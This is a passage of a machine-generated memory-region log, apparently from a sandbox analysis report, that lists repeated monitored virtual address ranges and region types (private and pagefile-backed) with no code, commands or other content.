= "private_0x0000000002270000" filename = "" Region: id = 10834 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10835 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10836 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10837 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10838 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10839 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10840 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10841 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10842 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10843 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10844 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10845 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10846 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10847 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10848 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10849 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10850 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10851 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10852 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10853 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10854 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10855 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10856 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10857 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10858 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10859 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10860 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10861 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10862 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10863 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10864 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10865 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10866 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10867 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10868 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10869 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10870 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10871 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10872 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10873 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10874 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10875 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10876 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10877 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10878 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10879 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10880 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10881 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10882 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10883 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10884 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10885 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10886 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10887 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10888 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10889 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10890 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10891 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10892 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10893 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10894 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10895 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10896 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10897 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10898 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10899 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10900 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10901 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10902 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10903 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10904 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10905 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10906 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10907 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10908 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10909 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10910 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10911 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10912 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10913 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10914 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10915 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10916 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10917 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10918 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10919 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10920 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10921 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10922 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10923 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10924 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10925 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10926 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10927 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10928 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10929 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10930 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10931 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10932 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10933 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10934 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10935 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10936 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10937 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10938 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10939 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10940 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10941 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10942 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10943 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10944 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10945 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10946 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10947 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10948 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10949 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10950 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10951 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10952 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10953 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10954 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10955 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10956 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10957 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10958 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10959 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10960 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10961 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10962 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10963 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10964 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10965 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10966 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10967 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10968 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10969 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10970 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10971 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10972 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10973 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10974 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10975 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10976 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10977 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10978 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10979 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10980 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10981 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10982 start_va = 0x400000 end_va = 0x402fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10983 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10984 start_va = 0xfd50000 end_va = 0x10241fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fd50000" filename = "" Region: id = 10985 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10986 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10987 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10988 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10989 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10990 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10991 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10992 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10993 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10994 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10995 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10996 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10997 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10998 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 10999 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11000 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11001 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11002 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11003 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11004 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11005 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11006 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11007 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11008 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11009 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11010 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11011 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11012 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11013 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11014 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11015 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11016 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11017 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11018 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11019 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11020 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11021 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11022 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11023 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11024 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11025 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11026 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11027 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11028 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 11029 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 11030 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11031 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11032 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" 